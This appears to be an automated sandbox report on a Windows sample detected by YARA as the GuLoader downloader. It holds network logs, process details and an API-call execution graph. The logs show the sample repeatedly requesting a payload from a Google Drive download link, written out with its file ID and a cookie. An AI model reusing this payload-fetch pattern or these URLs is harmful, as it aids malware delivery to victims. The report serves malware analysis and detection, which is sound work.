                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:15:12 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 57 4d 76 66 71 57 4a 5f 68 79 59 59 52 62 47 4f 38 43 4a 65 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zWMvfqWJ_hyYYRbGO8CJeA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID:22
                                                        Source IP:192.168.2.4
                                                        Source Port:50024
                                                        Destination IP:142.250.184.206
                                                        Destination Port:443
                                                        PID:7776
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:15:22 UTC | 422 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:23 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:23 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce--O0ZoqzbgCPl6Qil_S71XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID:23
                                                        Source IP:192.168.2.4
                                                        Source Port:50025
                                                        Destination IP:172.217.16.193
                                                        Destination Port:443
                                                        PID:7776
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:15:24 UTC | 464 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:24 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgSq6ud_327R7xOMjGPXJwHGdAmG87EX8cjiSO49oI7NbwnaQ7lFhgWvUv_cy1t7NTyuhDkZK7E
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:24 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-0caRob6R8X__-ngXWLX0Kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:15:24 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 64 4b 6a 6f 38 41 69 78 43 6e 58 5a 43 62 31 30 5a 33 43 4e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="udKjo8AixCnXZCb10Z3CNw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID:24
                                                        Source IP:192.168.2.4
                                                        Source Port:50026
                                                        Destination IP:142.250.184.206
                                                        Destination Port:443
                                                        PID:7776
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:15:35 UTC | 422 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:35 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:35 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-EwlLgwpUBVkqVK0btTwUeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID:25
                                                        Source IP:192.168.2.4
                                                        Source Port:50027
                                                        Destination IP:172.217.16.193
                                                        Destination Port:443
                                                        PID:7776
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:15:36 UTC | 464 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:15:36 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5HpEDFlNl_sVXkrI_HxMYa_wWbg_RuyUaMYs-q7tV_i2PoLblnkXgfaeHsY65fH1_qXIcgRJ0
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:15:36 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-huVe7-4IFBVgTTNQZDWENQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:15:36 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 34 62 38 35 45 54 48 56 73 46 49 6e 4d 47 44 50 56 48 73 42 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u4b85ETHVsFInMGDPVHsBA">*{margin:0;padding:0}html,code{font:15px/22px arial



                                                        Target ID:0
                                                        Start time:23:12:39
                                                        Start date:10/01/2025
                                                        Path:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\QNuQ5e175D.exe"
                                                        Imagebase:0x400000
                                                        File size:585'064 bytes
                                                        MD5 hash:9BB2CDB8508EE2255A35ECEC43462A48
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1944070834.000000000456C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:23:13:02
                                                        Start date:10/01/2025
                                                        Path:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\QNuQ5e175D.exe"
                                                        Imagebase:0x400000
                                                        File size:585'064 bytes
                                                        MD5 hash:9BB2CDB8508EE2255A35ECEC43462A48
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.3567436763.00000000017EC000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                          Execution Graph

                                                          Execution Coverage:22.3%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:16%
                                                          Total number of Nodes:1575
                                                          Total number of Limit Nodes:40
405e92 2 API calls 4364->4369 4368 405d01 4365->4368 4366->4367 4370 4068d4 2 API calls 4366->4370 4367->4226 4371 405d11 lstrcatW 4368->4371 4372 405d07 4368->4372 4369->4368 4373 405e07 4370->4373 4375 405d1c lstrlenW FindFirstFileW 4371->4375 4372->4371 4372->4375 4373->4367 4374 405e0b 4373->4374 4376 405e46 3 API calls 4374->4376 4377 405de2 4375->4377 4395 405d3e 4375->4395 4378 405e11 4376->4378 4377->4366 4380 405c3b 5 API calls 4378->4380 4379 405dc5 FindNextFileW 4383 405ddb FindClose 4379->4383 4379->4395 4382 405e1d 4380->4382 4384 405e21 4382->4384 4385 405e37 4382->4385 4383->4377 4384->4367 4388 4055fc 28 API calls 4384->4388 4387 4055fc 28 API calls 4385->4387 4387->4367 4390 405e2e 4388->4390 4389 405c83 64 API calls 4389->4395 4392 406337 40 API calls 4390->4392 4391 4055fc 28 API calls 4391->4379 4393 405e35 4392->4393 4393->4367 4394 4055fc 28 API calls 4394->4395 4395->4379 4395->4389 4395->4391 4395->4394 4396 406337 40 API calls 4395->4396 4497 406577 lstrcpynW 4395->4497 4498 405c3b 4395->4498 4396->4395 4398 40634b 4397->4398 4400 403a4c CopyFileW 4397->4400 4509 4061bd 4398->4509 4400->4178 4400->4226 4402 4068ea FindClose 4401->4402 4403 4068f5 4401->4403 4402->4403 4403->4226 4405 403b87 4404->4405 4406 403b79 CloseHandle 4404->4406 4543 403bb4 4405->4543 4406->4405 4409 405c83 71 API calls 4410 403aa2 OleUninitialize 4409->4410 4410->4189 4410->4190 4412 401389 2 API calls 4411->4412 4413 401420 4412->4413 4413->4192 4415 405e62 lstrcatW 4414->4415 4416 40353f 4414->4416 4415->4416 4416->4241 4417->4247 4418->4249 4420 405ea0 4419->4420 4421 40310e 4420->4421 4422 405ea6 CharPrevW 4420->4422 4423 406577 lstrcpynW 4421->4423 4422->4420 4422->4421 4423->4253 4425 403047 4424->4425 4426 40305f 4424->4426 4427 403050 DestroyWindow 4425->4427 4428 403057 4425->4428 4429 403067 4426->4429 4430 40306f GetTickCount 4426->4430 4427->4428 4428->4255 4433 4069a7 2 API calls 4429->4433 4431 4030a0 4430->4431 4432 40307d CreateDialogParamW 
ShowWindow 4430->4432 4431->4255 4432->4431 4434 40306d 4433->4434 4434->4255 4435->4263 4438 4032f2 4436->4438 4437 403320 4440 4034f4 ReadFile 4437->4440 4438->4437 4460 40350a SetFilePointer 4438->4460 4441 40332b 4440->4441 4442 40348d 4441->4442 4443 40333d GetTickCount 4441->4443 4444 403477 4441->4444 4445 4034cf 4442->4445 4448 403491 4442->4448 4443->4444 4452 40338c 4443->4452 4444->4270 4447 4034f4 ReadFile 4445->4447 4446 4034f4 ReadFile 4446->4452 4447->4444 4448->4444 4449 4034f4 ReadFile 4448->4449 4450 406119 WriteFile 4448->4450 4449->4448 4450->4448 4451 4033e2 GetTickCount 4451->4452 4452->4444 4452->4446 4452->4451 4453 403407 MulDiv wsprintfW 4452->4453 4455 406119 WriteFile 4452->4455 4454 4055fc 28 API calls 4453->4454 4454->4452 4455->4452 4457 4060ea ReadFile 4456->4457 4458 403507 4457->4458 4458->4265 4459->4262 4460->4437 4462 403f33 4461->4462 4478 4064be wsprintfW 4462->4478 4464 403fa4 4479 403fd8 4464->4479 4466 403cd4 4466->4286 4467 403fa9 4467->4466 4468 4065b4 21 API calls 4467->4468 4468->4467 4482 404542 4469->4482 4471 404542 SendMessageW 4472 40572b OleUninitialize 4471->4472 4472->4318 4474 405719 4474->4471 4475 4056f2 4475->4474 4485 401389 4475->4485 4476->4282 4477->4288 4478->4464 4480 4065b4 21 API calls 4479->4480 4481 403fe6 SetWindowTextW 4480->4481 4481->4467 4483 40455a 4482->4483 4484 40454b SendMessageW 4482->4484 4483->4475 4484->4483 4487 401390 4485->4487 4486 4013fe 4486->4475 4487->4486 4488 4013cb MulDiv SendMessageW 4487->4488 4488->4487 4489->4332 4491 405f20 4490->4491 4492 405f0e 4490->4492 4494 405e73 CharNextW 4491->4494 4495 405f44 4491->4495 4492->4491 4493 405f1b CharNextW 4492->4493 4493->4495 4494->4491 4495->4335 4495->4336 4496->4363 4497->4395 4506 406042 GetFileAttributesW 4498->4506 4501 405c68 4501->4395 4502 405c56 RemoveDirectoryW 4504 405c64 4502->4504 4503 405c5e DeleteFileW 4503->4504 4504->4501 4505 405c74 SetFileAttributesW 4504->4505 4505->4501 4507 405c47 4506->4507 4508 406054 
SetFileAttributesW 4506->4508 4507->4501 4507->4502 4507->4503 4508->4507 4510 406213 GetShortPathNameW 4509->4510 4511 4061ed 4509->4511 4513 406332 4510->4513 4514 406228 4510->4514 4536 406067 GetFileAttributesW CreateFileW 4511->4536 4513->4400 4514->4513 4516 406230 wsprintfA 4514->4516 4515 4061f7 CloseHandle GetShortPathNameW 4515->4513 4517 40620b 4515->4517 4518 4065b4 21 API calls 4516->4518 4517->4510 4517->4513 4519 406258 4518->4519 4537 406067 GetFileAttributesW CreateFileW 4519->4537 4521 406265 4521->4513 4522 406274 GetFileSize GlobalAlloc 4521->4522 4523 406296 4522->4523 4524 40632b CloseHandle 4522->4524 4525 4060ea ReadFile 4523->4525 4524->4513 4526 40629e 4525->4526 4526->4524 4538 405fcc lstrlenA 4526->4538 4529 4062b5 lstrcpyA 4532 4062d7 4529->4532 4530 4062c9 4531 405fcc 4 API calls 4530->4531 4531->4532 4533 40630e SetFilePointer 4532->4533 4534 406119 WriteFile 4533->4534 4535 406324 GlobalFree 4534->4535 4535->4524 4536->4515 4537->4521 4539 40600d lstrlenA 4538->4539 4540 406015 4539->4540 4541 405fe6 lstrcmpiA 4539->4541 4540->4529 4540->4530 4541->4540 4542 406004 CharNextA 4541->4542 4542->4539 4544 403bc2 4543->4544 4545 403b8c 4544->4545 4546 403bc7 FreeLibrary GlobalFree 4544->4546 4545->4409 4546->4545 4546->4546 5119 401a55 5120 402dcb 21 API calls 5119->5120 5121 401a5e ExpandEnvironmentStringsW 5120->5121 5122 401a72 5121->5122 5124 401a85 5121->5124 5123 401a77 lstrcmpW 5122->5123 5122->5124 5123->5124 4589 4014d7 4590 402da9 21 API calls 4589->4590 4591 4014dd Sleep 4590->4591 4593 402c4f 4591->4593 5130 4023d7 5131 4023e5 5130->5131 5132 4023df 5130->5132 5133 4023f3 5131->5133 5135 402dcb 21 API calls 5131->5135 5134 402dcb 21 API calls 5132->5134 5136 402401 5133->5136 5137 402dcb 21 API calls 5133->5137 5134->5131 5135->5133 5138 402dcb 21 API calls 5136->5138 5137->5136 5139 40240a WritePrivateProfileStringW 5138->5139 4599 402459 4600 402461 4599->4600 4601 40248c 4599->4601 4602 402e0b 21 API calls 4600->4602 4603 
402dcb 21 API calls 4601->4603 4604 402468 4602->4604 4605 402493 4603->4605 4607 402472 4604->4607 4608 4024a0 4604->4608 4611 402e89 4605->4611 4609 402dcb 21 API calls 4607->4609 4610 402479 RegDeleteValueW RegCloseKey 4609->4610 4610->4608 4612 402e96 4611->4612 4613 402e9d 4611->4613 4612->4608 4613->4612 4615 402ece 4613->4615 4616 4063e4 RegOpenKeyExW 4615->4616 4617 402efc 4616->4617 4618 402fb1 4617->4618 4619 402f06 4617->4619 4618->4612 4620 402f0c RegEnumValueW 4619->4620 4627 402f2f 4619->4627 4621 402f96 RegCloseKey 4620->4621 4620->4627 4621->4618 4622 402f6b RegEnumKeyW 4623 402f74 RegCloseKey 4622->4623 4622->4627 4624 40696b 5 API calls 4623->4624 4625 402f84 4624->4625 4628 402fa6 4625->4628 4629 402f88 RegDeleteKeyW 4625->4629 4626 402ece 6 API calls 4626->4627 4627->4621 4627->4622 4627->4623 4627->4626 4628->4618 4629->4618 5140 40175a 5141 402dcb 21 API calls 5140->5141 5142 401761 SearchPathW 5141->5142 5143 40177c 5142->5143 5144 6fc41058 5146 6fc41074 5144->5146 5145 6fc410dd 5146->5145 5147 6fc41092 5146->5147 5157 6fc415b6 5146->5157 5149 6fc415b6 GlobalFree 5147->5149 5150 6fc410a2 5149->5150 5151 6fc410b2 5150->5151 5152 6fc410a9 GlobalSize 5150->5152 5153 6fc410b6 GlobalAlloc 5151->5153 5155 6fc410c7 5151->5155 5152->5151 5154 6fc415dd 3 API calls 5153->5154 5154->5155 5156 6fc410d2 GlobalFree 5155->5156 5156->5145 5159 6fc415bc 5157->5159 5158 6fc415c2 5158->5147 5159->5158 5160 6fc415ce GlobalFree 5159->5160 5160->5147 5161 401d5d 5162 402da9 21 API calls 5161->5162 5163 401d64 5162->5163 5164 402da9 21 API calls 5163->5164 5165 401d70 GetDlgItem 5164->5165 5166 40265d 5165->5166 5167 402663 5168 402692 5167->5168 5169 402677 5167->5169 5170 4026c2 5168->5170 5171 402697 5168->5171 5172 402da9 21 API calls 5169->5172 5174 402dcb 21 API calls 5170->5174 5173 402dcb 21 API calls 5171->5173 5175 40267e 5172->5175 5176 40269e 5173->5176 5177 4026c9 lstrlenW 5174->5177 5180 4026f6 5175->5180 5182 40270c 5175->5182 5183 406148 5 API calls 
